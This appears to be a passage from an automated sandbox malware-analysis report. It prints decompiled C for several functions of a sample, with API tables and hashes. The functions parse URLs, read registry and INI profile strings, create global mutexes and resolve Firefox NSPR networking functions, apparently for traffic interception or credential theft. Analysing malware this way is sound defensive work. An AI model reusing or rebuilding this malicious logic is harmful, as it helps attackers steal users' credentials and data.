            • LeaveCriticalSection.KERNEL32(0041A9F0,00000000,?,?), ref: 0040B1F7
            • LeaveCriticalSection.KERNEL32(0041A9F0), ref: 0040B216
              • Part of subcall function 00415540: StrCmpNIA.SHLWAPI(00000000,?,?,00000000,?,-0041AA0C,?,00000000), ref: 0041559A
              • Part of subcall function 00410418: HeapFree.KERNEL32(00000000,00000000,00411C0D,00000000,?,?,?,?,0040373A,00000000,00403AF4), ref: 0041042B
            • LeaveCriticalSection.KERNEL32(0041A9F0), ref: 0040B223
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CriticalSection$Leave$EnterObjectSingleWait$FreeHeap
            • String ID: 0$%x$Content-Length
            • API String ID: 197861008-3838797520
            • Opcode ID: 4395f1477fdfaa6c1f1e82e5c758a8e1d405cfb2a719a51da153664d4dda7306
            • Instruction ID: bdc1bea6f22d6aebb034f930d03155592da30f4eb9f235f8e930ea43e27315db
            • Opcode Fuzzy Hash: 4395f1477fdfaa6c1f1e82e5c758a8e1d405cfb2a719a51da153664d4dda7306
            • Instruction Fuzzy Hash: 2791D272500316AFC700DF25C98596EBBB4FF94354F00462EF950A72A2C778E9A5CBDA
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004072B2 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 360timenetworkCOMMON
            Download Yara Rule
            C-Code - Quality: 95%
            			E004072B2(char __eax, void* __ecx, char* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				char _v540;
				char _v800;
				char _v804;
				char _v860;
				char _v864;
				char _v876;
				struct _SYSTEMTIME _v896;
				intOrPtr _v968;
				intOrPtr _v980;
				intOrPtr _v984;
				intOrPtr _v988;
				char* _v992;
				char _v995;
				char _v996;
				char _v1000;
				void* _v1008;
				struct _SYSTEMTIME _v1028;
				signed short* _v1032;
				signed short* _v1036;
				signed short _v1040;
				intOrPtr* _v1044;
				signed int _v1048;
				void* _v1052;
				signed int _v1056;
				signed int _v1060;
				char _v1064;
				intOrPtr _v1068;
				char _v1072;
				intOrPtr _v1076;
				intOrPtr _v1080;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t151;
				signed int _t152;
				intOrPtr _t153;
				signed int _t161;
				void* _t180;
				void* _t191;
				signed short _t203;
				signed int _t208;
				signed int _t211;
				signed char _t215;
				signed int _t217;
				void* _t220;
				void* _t221;
				signed int _t222;
				signed int _t223;
				signed short* _t232;
				signed short _t233;
				void* _t235;
				signed int _t243;
				intOrPtr* _t247;
				signed int _t248;
				intOrPtr _t251;
				intOrPtr* _t276;
				signed int _t281;
				long _t284;
				signed short* _t286;
				signed short* _t288;
				signed int _t291;
				intOrPtr* _t293;
				signed int _t297;
				void* _t299;

				_t299 = (_t297 & 0xfffffff8) - 0x424;
				_v1028.wYear = _v1028.wYear & 0x00000000;
				if(__eax <= 0) {
					L51:
					asm("sbb eax, eax");
					return  ~0x00000000;
				} else {
					_t276 = __ecx + 0x10;
					_v1044 = _t276;
					_v1028.wDayOfWeek = __eax;
					do {
						_t251 =  *_t276;
						if(_t251 == 0) {
							_t247 = _a8;
							L6:
							_t252 =  *(_t276 + 4);
							_v1048 = _v1048 & 0x00000000;
							_v1060 = _v1060 & 0x00000000;
							_t151 =  *((intOrPtr*)(_t276 + 8)) + _t252;
							_v1028.wSecond = _t151;
							if(_t252 >= _t151) {
								L36:
								_t152 =  *(_t276 - 0x10);
								_t284 = 0;
								if((_t152 & 0x00000008) != 0 && _v1048 != 0) {
									if((_t152 & 0x00000200) == 0) {
										_t248 = E0041065D(_t152 | 0xffffffff, 0, _a4);
										__eflags = _t248;
										if(_t248 != 0) {
											_t180 = 5;
											E0040F369(_t180,  &_v996);
											_push(_v1048);
											E0040D965(_t252, _t270, __eflags, 0xc9, _t248, 0,  &_v996, _t248);
											_t299 = _t299 + 0x18;
											E00410418(_t248);
										}
									} else {
										_t270 = 0x3c;
										E004104CB( &_v996,  &_v996, 0, _t270);
										_v992 =  &_v800;
										_v1008 = _t270;
										_v988 = 0x103;
										if(InternetCrackUrlA(_a4, 0, 0,  &_v1008) == 1 && _v992 > 0) {
											GetSystemTime( &_v1028);
											_t296 =  &_v876;
											_t191 = 4;
											E0040F369(_t191,  &_v876);
											_push(_v1028.wDay & 0x0000ffff);
											_push(_v1028.wMonth & 0x0000ffff);
											_push((_v1028.wYear & 0x0000ffff) - 0x7d0);
											_push( &_v804);
											_t270 = 0x104;
											E004111A5( &_v876, 0x104,  &_v540, _t296);
											_t299 = _t299 + 0x14;
											E0040D77B(_t252, 0x104, 2, 0,  &_v540, _v1064, _v1076);
											_t276 = _v1080;
										}
									}
									E00410418(_v1048);
									_t284 = 0;
								}
								if( *((intOrPtr*)(_t276 - 4)) != _t284) {
									if(( *(_t276 - 0x10) & 0x00000010) == 0) {
										EnterCriticalSection(0x41a9bc);
										E00410418( *0x41a9d4);
										_t161 = E00410882(E00410418( *0x41a9d8) | 0xffffffff,  *((intOrPtr*)(_t276 - 0xc)));
										 *0x41a9d4 = _t161;
										__eflags = _t161 | 0xffffffff;
										 *0x41a9d8 = E00410882(_t161 | 0xffffffff,  *((intOrPtr*)(_t276 - 4)));
										LeaveCriticalSection(0x41a9bc);
									} else {
										E00403F5F( &_v860, _t252, 1,  &_v996);
										if(E00411780( &(_v896.wSecond),  *((intOrPtr*)(_t276 - 4)), E00411086( *((intOrPtr*)(_t276 - 4)))) != 0) {
											E00410CE3( &_v860,  &_v876);
											GetLocalTime( &_v896);
											E004144D2( &_v860,  &_v1000,  &_v864, 3,  &_v896, 0x10);
										}
									}
								}
								goto L50;
							} else {
								goto L9;
								L13:
								_t270 =  *_t203 & 0x0000ffff;
								if(_t270 != 4) {
									_t252 = (_t270 & 0x0000ffff) - 4;
									_t211 = E004066A8(_t203 + 4, 0,  &_v1052, (_t270 & 0x0000ffff) - 4,  *_t247 + _v1056,  *_a12 - _v1056);
									__eflags = _t211;
									if(_t211 == 0) {
										goto L34;
									} else {
										__eflags =  *_v1032 - 4;
										_t288 = _v1036;
										if( *_v1032 != 4) {
											_t48 =  &_v1052;
											 *_t48 = _v1052 + _v1056;
											__eflags =  *_t48;
										} else {
											_v1056 = _v1052;
										}
										goto L22;
									}
								} else {
									if( *_t252 != _t270) {
										_t243 = _v1056;
									} else {
										_t243 =  *_a12;
									}
									_v1052 = _t243;
									L22:
									_t252 = _v1052 - _v1056;
									_t215 =  *(_v1044 - 0x10);
									_t281 = ( *_t288 & 0x0000ffff) - 4;
									_v1040 = _t252;
									if((_t215 & 0x00000004) == 0) {
										__eflags = _t215 & 0x00000008;
										if((_t215 & 0x00000008) != 0) {
											_t217 = E004103A8(_t252 + _t281 + _v1060 + 2,  &_v1048);
											__eflags = _t217;
											if(_t217 != 0) {
												_t291 = _v1048;
												__eflags = _t281;
												if(_t281 > 0) {
													E00410454(_v1060 + _t291,  &(_v1036[2]), _t281);
													_t78 =  &_v1072;
													 *_t78 = _v1072 + _t281;
													__eflags =  *_t78;
												}
												_t270 = _v1040;
												_t220 = E00410454(_v1060 + _t291,  *_t247 + _v1056, _t270);
												_t252 = _v1056;
												__eflags =  *(_t252 - 0x10) & 0x00000100;
												if(( *(_t252 - 0x10) & 0x00000100) == 0) {
													_t221 = E004151C4(_t220, _t270);
													_t89 =  &_v1064;
													 *_t89 = _v1064 + _t221;
													__eflags =  *_t89;
													_t247 = _a8;
												} else {
													_v1060 = _v1060 + _t270;
												}
												_t222 = _v1060;
												 *((char*)(_t222 + _t291)) = 0xa;
												_t223 = _t222 + 1;
												__eflags = _t223;
												_v1060 = _t223;
												 *((char*)(_t223 + _t291)) = 0;
											}
										}
									} else {
										_t232 =  *_a12 - _t252 + _t281;
										_v1032 = _t232;
										if(_t232 != 0) {
											_t233 = E004103ED(_t232);
											_v1040 = _t233;
											if(_t233 != 0) {
												_t270 = _v1056;
												_t235 = E00410454(E00410454(_t233,  *_t247, _v1056) + _v1056,  &(_t288[2]), _t281);
												_t293 = _a12;
												_t252 =  *_t247 + _v1076;
												E00410454(_t235 + _t281 + _v1056,  *_t247 + _v1076,  *_t293 - _v1076);
												E00410418( *_t247);
												_v1068 = _v1068 + 1;
												 *_t247 = _v1080;
												 *_t293 = _v1072;
											}
										}
									}
									L34:
									if(_v1028.wHour < _v1028.wSecond) {
										_t252 = _v1028.wHour;
										L9:
										_t203 = _t252 + ( *_t252 & 0x0000ffff);
										_t286 = ( *_t203 & 0x0000ffff) + _t203;
										_v1028.wHour = _t286 + ( *_t286 & 0x0000ffff);
										_t270 =  *_t252 & 0x0000ffff;
										_v1032 = _t252;
										_v1040 = _t203;
										_v1036 = _t286;
										if(( *_t252 & 0x0000ffff) != 4) {
											goto L11;
										} else {
											_v1056 = _v1056 & 0x00000000;
											goto L13;
										}
									} else {
										_t276 = _v1044;
										goto L36;
									}
								}
								L11:
								_t208 = E004066A8( &(_t252[2]),  &_v1056, 0, (_t270 & 0x0000ffff) - 4,  *_t247,  *_a12);
								__eflags = _t208;
								if(_t208 == 0) {
									goto L34;
								} else {
									_t252 = _v1032;
									_t288 = _v1036;
									_t203 = _v1040;
									goto L13;
								}
							}
						}
						_v995 = 0x2a;
						_v996 = 0x3f;
						_v992 = _t251;
						_t153 = E00411086(_t251);
						_t247 = _a8;
						_v988 = _t153;
						_v984 =  *_t247;
						_v980 =  *_a12;
						_v968 = 0x12;
						if(E0041145A( &_v996) != 0) {
							goto L6;
						}
						L50:
						_t276 = _t276 + 0x1c;
						_t143 =  &(_v1028.wDayOfWeek);
						 *_t143 = _v1028.wDayOfWeek - 1;
						_v1044 = _t276;
					} while ( *_t143 != 0);
					goto L51;
				}
			}



































































            0x004072b8
            0x004072be
            0x004072c8
            0x00407741
            0x00407748
            0x00407751
            0x004072ce
            0x004072d0
            0x004072d3
            0x004072d7
            0x004072db
            0x004072db
            0x004072df
            0x00407325
            0x00407328
            0x00407328
            0x0040732e
            0x00407333
            0x00407338
            0x0040733a
            0x00407340
            0x00407548
            0x00407548
            0x0040754b
            0x0040754f
            0x00407564
            0x00407629
            0x0040762b
            0x0040762d
            0x00407635
            0x00407636
            0x0040763b
            0x0040764b
            0x00407650
            0x00407654
            0x00407654
            0x0040756a
            0x0040756c
            0x00407574
            0x00407580
            0x0040758e
            0x00407592
            0x004075a3
            0x004075b8
            0x004075c0
            0x004075c7
            0x004075c8
            0x004075d2
            0x004075d8
            0x004075e3
            0x004075eb
            0x004075ef
            0x004075fb
            0x00407600
            0x00407612
            0x00407617
            0x00407617
            0x004075a3
            0x0040765d
            0x00407662
            0x00407662
            0x00407667
            0x00407671
            0x004076ed
            0x004076f9
            0x0040770f
            0x00407714
            0x0040771c
            0x00407725
            0x0040772a
            0x00407673
            0x00407681
            0x0040769f
            0x004076b4
            0x004076c1
            0x004076e0
            0x004076e0
            0x0040769f
            0x00407671
            0x00000000
            0x00407346
            0x00407346
            0x004073ab
            0x004073ab
            0x004073b2
            0x004073e3
            0x004073eb
            0x004073f0
            0x004073f2
            0x00000000
            0x004073f8
            0x004073fc
            0x00407400
            0x00407404
            0x00407414
            0x00407414
            0x00407414
            0x00407406
            0x0040740a
            0x0040740a
            0x00000000
            0x00407404
            0x004073b4
            0x004073b7
            0x004073c0
            0x004073b9
            0x004073bc
            0x004073bc
            0x004073c4
            0x00407418
            0x00407423
            0x00407427
            0x0040742a
            0x0040742d
            0x00407433
            0x004074ab
            0x004074ad
            0x004074c1
            0x004074c6
            0x004074c8
            0x004074ca
            0x004074ce
            0x004074d0
            0x004074e2
            0x004074e7
            0x004074e7
            0x004074e7
            0x004074e7
            0x004074ed
            0x004074fe
            0x00407503
            0x00407507
            0x0040750e
            0x00407519
            0x0040751e
            0x0040751e
            0x0040751e
            0x00407522
            0x00407510
            0x00407510
            0x00407510
            0x00407525
            0x00407529
            0x0040752d
            0x0040752d
            0x0040752e
            0x00407532
            0x00407532
            0x004074c8
            0x00407435
            0x0040743c
            0x0040743e
            0x00407442
            0x00407448
            0x0040744d
            0x00407453
            0x00407459
            0x0040746f
            0x00407474
            0x00407482
            0x0040748a
            0x00407491
            0x0040749a
            0x0040749e
            0x004074a4
            0x004074a4
            0x00407453
            0x00407442
            0x00407536
            0x0040753e
            0x00407348
            0x0040734c
            0x0040734f
            0x00407354
            0x0040735b
            0x0040735f
            0x00407362
            0x00407366
            0x0040736a
            0x00407372
            0x00000000
            0x00407374
            0x00407374
            0x00000000
            0x00407374
            0x00407544
            0x00407544
            0x00000000
            0x00407544
            0x0040753e
            0x0040737b
            0x00407392
            0x00407397
            0x00407399
            0x00000000
            0x0040739f
            0x0040739f
            0x004073a3
            0x004073a7
            0x00000000
            0x004073a7
            0x00407399
            0x00407340
            0x004072e1
            0x004072e6
            0x004072eb
            0x004072ef
            0x004072f4
            0x004072f7
            0x004072fd
            0x0040730a
            0x0040730e
            0x0040731d
            0x00000000
            0x00407323
            0x00407730
            0x00407730
            0x00407733
            0x00407733
            0x00407737
            0x00407737
            0x00000000
            0x004072db

            APIs
            • InternetCrackUrlA.WININET ref: 0040759A
            • GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 004075B8
            • GetLocalTime.KERNEL32(?,?,?,?,00000000,00000001,?), ref: 004076C1
            • EnterCriticalSection.KERNEL32(0041A9BC), ref: 004076ED
            • LeaveCriticalSection.KERNEL32(0041A9BC,?,?), ref: 0040772A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CriticalSectionTime$CrackEnterInternetLeaveLocalSystem
            • String ID: *$?
            • API String ID: 2400141425-2367018687
            • Opcode ID: 63ab0a42a8ead902a5bdf2fb5ae747b6ed52468fc7cc668d6d8b7afa0da27cdb
            • Instruction ID: 392519b071d91e1097d54d43a028b7cb0d4d4180e20fb72250ebccf4c8f84bc5
            • Opcode Fuzzy Hash: 63ab0a42a8ead902a5bdf2fb5ae747b6ed52468fc7cc668d6d8b7afa0da27cdb
            • Instruction Fuzzy Hash: 3BD17D719083419FD710DF69C880AABB7E4FF88318F00492EF995A7291D778E945CB6B
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040DD5A Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 158memorysynchronizationthreadCOMMON
            Download Yara Rule
            C-Code - Quality: 93%
            			E0040DD5A(void* __ecx, void* __edx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				char _v92;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				void* _t25;
				long _t27;
				void* _t28;
				long _t29;
				void* _t33;
				void* _t37;
				void* _t39;
				void* _t42;
				void* _t45;
				void* _t52;
				void* _t57;
				void* _t62;
				void* _t70;
				WCHAR* _t74;
				void* _t75;
				void* _t79;
				void* _t80;

				_t70 = __edx;
				_t64 = __ecx;
				_t22 = E00403D00(__ecx, __eflags, 0x743c1521, 2);
				_v28 = _t22;
				if(_t22 != 0) {
					SetThreadPriority(GetCurrentThread(), 0xfffffff1);
					_t25 = E00403E39();
					__eflags = _t25;
					if(_t25 == 0) {
						L24:
						E00413A4E(_v28);
						__eflags = 0;
						return 0;
					}
					_t27 = WaitForSingleObject( *0x41a758, 0xea60);
					__eflags = _t27 - 0x102;
					if(_t27 != 0x102) {
						goto L24;
					}
					do {
						_t28 = E00405F53(_t64);
						_v24 = _t28;
						__eflags = _t28;
						if(__eflags == 0) {
							goto L22;
						}
						_t62 = E00416037( &_v16, _t70, __eflags, _t28, 2, 0x20000000);
						_v20 = _t62;
						__eflags = _t62;
						if(__eflags == 0) {
							L21:
							E00410418(_v20);
							E00410418(_v24);
							goto L22;
						}
						_t64 = _v16;
						_t33 = E0040DA9F(_v16, __eflags, _t62);
						__eflags = _t33;
						if(_t33 == 0) {
							goto L21;
						} else {
							goto L8;
						}
						do {
							L8:
							_v8 = E0041133B(_t62, 1);
							_v12 = E0041133B(_t62, 2);
							_t37 = E00411888(_t62, E00411086(_t62));
							_t68 = _v8;
							_t39 = E00411888(_t68, E00411086(_v8));
							_t69 = _v12;
							_push(E00411888(_t69, E00411086(_v12)));
							_push(_t39);
							_push(_t37);
							_push(L"Global\\%08X%08X%08X");
							_t70 = 0x20;
							_t74 =  &_v92;
							_t42 = E004111A5(_t41, _t70, _t74);
							_t80 = _t80 + 0x10;
							__eflags = _t42 - 0x1f;
							if(_t42 != 0x1f) {
								goto L20;
							}
							_t45 = CreateMutexW(0x41a2c8, 1, _t74);
							__eflags = _t45;
							if(_t45 == 0) {
								_t79 = 0;
								__eflags = 0;
							} else {
								_t79 = E00413A5E(_t45);
							}
							__eflags = _t79;
							if(_t79 != 0) {
								_t75 = HeapAlloc( *0x41bc68, 8, 0x14);
								__eflags = _t75;
								if(_t75 == 0) {
									L19:
									E00413A4E(_t79);
									goto L20;
								}
								 *_t75 = E00410882(_t46 | 0xffffffff, _t62);
								 *(_t75 + 4) = E00410882(_t48 | 0xffffffff, _v8);
								_t52 = E00410882(_t50 | 0xffffffff, _v12);
								__eflags =  *_t75;
								 *(_t75 + 8) = _t52;
								 *(_t75 + 0xc) = _t79;
								if( *_t75 == 0) {
									L18:
									E00410418( *_t75);
									E00410418( *(_t75 + 4));
									E00410418( *(_t75 + 8));
									E00410418(_t75);
									goto L19;
								}
								__eflags =  *(_t75 + 4);
								if( *(_t75 + 4) == 0) {
									goto L18;
								}
								__eflags = _t52;
								if(_t52 == 0) {
									goto L18;
								}
								_t57 = E00411E25(0x80000, E0040DBA4, _t75);
								__eflags = _t57;
								if(_t57 > 0) {
									goto L20;
								}
								goto L18;
							}
							L20:
							_t64 = _t62;
							_t62 = E0041133B(_t62, 3);
							__eflags = _t62;
						} while (_t62 != 0);
						goto L21;
						L22:
						_t29 = WaitForSingleObject( *0x41a758, 0xea60);
						__eflags = _t29 - 0x102;
					} while (_t29 == 0x102);
					goto L24;
				}
				return _t22 + 1;
			}






























            0x0040dd5a
            0x0040dd5a
            0x0040dd67
            0x0040dd6c
            0x0040dd71
            0x0040dd82
            0x0040dd88
            0x0040dd8d
            0x0040dd8f
            0x0040df48
            0x0040df4b
            0x0040df50
            0x00000000
            0x0040df50
            0x0040dda0
            0x0040dda6
            0x0040ddab
            0x00000000
            0x00000000
            0x0040ddb4
            0x0040ddb4
            0x0040ddb9
            0x0040ddbc
            0x0040ddbe
            0x00000000
            0x00000000
            0x0040ddd4
            0x0040ddd6
            0x0040ddd9
            0x0040dddb
            0x0040df19
            0x0040df1c
            0x0040df24
            0x00000000
            0x0040df24
            0x0040dde1
            0x0040dde5
            0x0040ddea
            0x0040ddec
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0040ddf2
            0x0040ddf2
            0x0040ddff
            0x0040de09
            0x0040de13
            0x0040de18
            0x0040de24
            0x0040de29
            0x0040de3a
            0x0040de3b
            0x0040de3c
            0x0040de3d
            0x0040de44
            0x0040de45
            0x0040de48
            0x0040de4d
            0x0040de50
            0x0040de53
            0x00000000
            0x00000000
            0x0040de63
            0x0040de69
            0x0040de6b
            0x0040de76
            0x0040de76
            0x0040de6d
            0x0040de72
            0x0040de72
            0x0040de78
            0x0040de7a
            0x0040de90
            0x0040de92
            0x0040de94
            0x0040df00
            0x0040df01
            0x00000000
            0x0040df01
            0x0040dea2
            0x0040deaf
            0x0040deb5
            0x0040deba
            0x0040debd
            0x0040dec0
            0x0040dec3
            0x0040dee3
            0x0040dee5
            0x0040deed
            0x0040def5
            0x0040defb
            0x00000000
            0x0040defb
            0x0040dec5
            0x0040dec9
            0x00000000
            0x00000000
            0x0040decb
            0x0040decd
            0x00000000
            0x00000000
            0x0040deda
            0x0040dedf
            0x0040dee1
            0x00000000
            0x00000000
            0x00000000
            0x0040dee1
            0x0040df06
            0x0040df08
            0x0040df0f
            0x0040df11
            0x0040df11
            0x00000000
            0x0040df29
            0x0040df34
            0x0040df3a
            0x0040df3a
            0x00000000
            0x0040df47
            0x00000000

            APIs
              • Part of subcall function 00403D00: CreateMutexW.KERNEL32(0041A2C8,00000000,?,?,?,?,?), ref: 00403D21
            • GetCurrentThread.KERNEL32 ref: 0040DD7B
            • SetThreadPriority.KERNEL32(00000000), ref: 0040DD82
            • WaitForSingleObject.KERNEL32(0000EA60), ref: 0040DDA0
            • CreateMutexW.KERNEL32(0041A2C8,00000001,?,20000000), ref: 0040DE63
            • HeapAlloc.KERNEL32(00000008,00000014), ref: 0040DE8A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CreateMutexThread$AllocCurrentHeapObjectPrioritySingleWait
            • String ID: Global\%08X%08X%08X
            • API String ID: 1505615485-3239447729
            • Opcode ID: c10627ba3208524f0223781e0d581368e38704ff0f5d5fc6b1b5f419f8f1845c
            • Instruction ID: a30a8260ae780317d42c52654180516328ecbbc272e723380c7bb3867ec0be5c
            • Opcode Fuzzy Hash: c10627ba3208524f0223781e0d581368e38704ff0f5d5fc6b1b5f419f8f1845c
            • Instruction Fuzzy Hash: 0041D970E4020676DB107BB28D46F9E7A65AF10755F10863FF611B62E2DB7C8D8486AC
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00408302 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 156COMMON
            Download Yara Rule
            C-Code - Quality: 80%
            			E00408302(char* __ecx, char* __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char* _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v64;
				char _v72;
				char _v92;
				char _v116;
				char _v160;
				char _v188;
				char _v260;
				short _v774;
				char _v780;
				short _v1300;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t47;
				void* _t49;
				void* _t54;
				void* _t56;
				void* _t60;
				void* _t62;
				void* _t64;
				void* _t71;
				void* _t73;
				void* _t78;
				WCHAR* _t104;
				signed int _t105;
				WCHAR* _t106;
				char* _t112;
				intOrPtr _t113;
				void* _t116;
				intOrPtr _t129;

				_t103 = __edx;
				_t101 = __ecx;
				E004104CB( &_v12,  &_v12, 0, 8);
				_t47 = 0x41;
				E0040F369(_t47,  &_v260);
				_t49 = 0x42;
				E0040F369(_t49,  &_v116);
				_t104 =  &_v780;
				_t54 = E004143B6(0x80000001, 0x104, _t101, _t104,  &_v260,  &_v116);
				if(_t54 != 0xffffffff && _t54 > 0) {
					ExpandEnvironmentStringsW(_t104,  &_v1300, 0x104);
					E00408100(_t103,  &_v1300,  &_v12);
					PathRemoveFileSpecW( &_v1300);
				}
				_t105 = 0;
				if(_v8 != 0) {
					L14:
					_t129 = _v8;
					L15:
					if(_t129 > 0) {
						_t109 =  &_v72;
						_t56 = 0x47;
						E0040F369(_t56,  &_v72);
						E0040D929( &_v72, _v12, _t103, _t129, _t109);
					}
					return E00410418(_v12);
				}
				_t60 = 0x44;
				E0040F369(_t60,  &_v64);
				_t62 = 0x45;
				E0040F369(_t62,  &_v160);
				_t112 =  &_v92;
				_t64 = 0x46;
				E0040F369(_t64, _t112);
				_v24 =  &_v64;
				_v20 =  &_v160;
				_v40 = 0x24;
				_v36 = 0x1a;
				_v32 = 0x26;
				_v28 = 0x23;
				_v16 = _t112;
				do {
					_t113 =  *((intOrPtr*)(_t116 + _t105 * 4 - 0x24));
					__imp__SHGetFolderPathW(0, _t113, 0, 0,  &_v780);
					if(0 == 0) {
						_t122 = _t113 - 0x24;
						if(_t113 == 0x24) {
							E004080BE(_t122,  &_v780,  &_v12, 0);
							_v774 = 0;
						}
						_t103 =  &_v24;
						_t101 =  &_v780;
						E00415BE8( &_v780,  &_v24, 0, 3, 2, E004082B9,  &_v12, 0, 0, 0);
					}
					_t105 = _t105 + 1;
				} while (_t105 < 4);
				if(_v8 != 0) {
					goto L15;
				}
				_t71 = 0x41;
				E0040F369(_t71,  &_v188);
				_t73 = 0x43;
				E0040F369(_t73,  &_v64);
				_t106 =  &_v780;
				_t78 = E004143B6(0x80000001, 0x104, _t101, _t106,  &_v188,  &_v64);
				if(_t78 != 0xffffffff) {
					_t128 = _t78;
					if(_t78 > 0) {
						ExpandEnvironmentStringsW(_t106,  &_v1300, 0x104);
						E004080BE(_t128,  &_v1300,  &_v12, 1);
					}
				}
				goto L14;
			}










































            0x00408302
            0x00408302
            0x00408316
            0x00408323
            0x00408324
            0x0040832e
            0x0040832f
            0x00408343
            0x0040834e
            0x00408356
            0x00408367
            0x00408378
            0x00408384
            0x00408384
            0x0040838a
            0x0040838f
            0x004084ae
            0x004084ae
            0x004084b2
            0x004084b2
            0x004084b6
            0x004084b9
            0x004084ba
            0x004084c5
            0x004084c5
            0x004084d6
            0x004084d6
            0x0040839a
            0x0040839b
            0x004083a8
            0x004083a9
            0x004083b0
            0x004083b3
            0x004083b4
            0x004083bc
            0x004083c5
            0x004083ca
            0x004083d1
            0x004083d8
            0x004083df
            0x004083e6
            0x004083e9
            0x004083e9
            0x004083fa
            0x00408402
            0x00408404
            0x00408407
            0x00408415
            0x0040841c
            0x0040841c
            0x00408435
            0x00408438
            0x0040843e
            0x0040843e
            0x00408443
            0x00408444
            0x0040844d
            0x00000000
            0x00000000
            0x00408457
            0x00408458
            0x00408462
            0x00408463
            0x00408472
            0x0040847d
            0x00408485
            0x00408487
            0x00408489
            0x00408496
            0x004084a9
            0x004084a9
            0x00408489
            0x00000000

            APIs
              • Part of subcall function 004143B6: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000001,00000000,?,?,0040F571,?,00000017,.exe,00000000,00000000), ref: 004143C9
            • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000003,00000000,00000008,?,?,00000001), ref: 00408367
              • Part of subcall function 00408100: HeapAlloc.KERNEL32(00000008,00020002,?,?,00000104), ref: 0040811F
              • Part of subcall function 00408100: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00408140
              • Part of subcall function 00408100: HeapAlloc.KERNEL32(00000008,00000C0C), ref: 0040816A
              • Part of subcall function 00408100: StrStrIW.SHLWAPI(00000001,?), ref: 004081D6
              • Part of subcall function 00408100: StrStrIW.SHLWAPI(00000001,?), ref: 004081E7
              • Part of subcall function 00408100: GetPrivateProfileStringW.KERNEL32(00000001,?,00000000,?,000000FF,?), ref: 00408203
              • Part of subcall function 00408100: GetPrivateProfileStringW.KERNEL32(00000001,?,00000000,?,000000FF,?), ref: 00408221
            • PathRemoveFileSpecW.SHLWAPI(?,?,00000003,?,?,00000001), ref: 00408384
            • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,?,?,00000003,00000000,00000008,?,?,00000001), ref: 004083FA
            • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,?,?,00000001), ref: 00408496
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: PrivateProfileString$AllocEnvironmentExpandHeapPathStrings$FileFolderOpenRemoveSpec
            • String ID: #$$$&
            • API String ID: 2372788633-1941049543
            • Opcode ID: 0b83daaa94d2b68bc5978299d3d86b67dd8bdab18afb4862d94cef60be476bbf
            • Instruction ID: 6584ba56b05fd5600762627c01845f20b3b2c60ae91a180fac9c893d6b8f01b3
            • Opcode Fuzzy Hash: 0b83daaa94d2b68bc5978299d3d86b67dd8bdab18afb4862d94cef60be476bbf
            • Instruction Fuzzy Hash: E9513F72E00218AADF20DBB1CD45BDE77BCAB04714F00447BB658F7181EB789B898B95
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040A754 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 30libraryloaderCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0040A754(struct HINSTANCE__* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t14;

				 *0x41aa0c =  *0x41aa0c & 0x00000000;
				 *0x41aa10 =  *0x41aa10 & 0x00000000;
				_t14 = __eax;
				InitializeCriticalSection(0x41a9f0);
				 *0x41aa08 = _a4;
				 *0x41a9e4 = _a8;
				 *0x41aa14 = _a12;
				 *0x41a9e8 = _t14;
				 *0x41a9e0 = _a16;
				 *0x41a9dc = GetProcAddress(_t14, "PR_GetNameForIdentity");
				 *0x41a9ec = GetProcAddress( *0x41a9e8, "PR_SetError");
				_t12 = GetProcAddress( *0x41a9e8, "PR_GetError");
				 *0x41a8ec = _t12;
				return _t12;
			}





            0x0040a754
            0x0040a75b
            0x0040a768
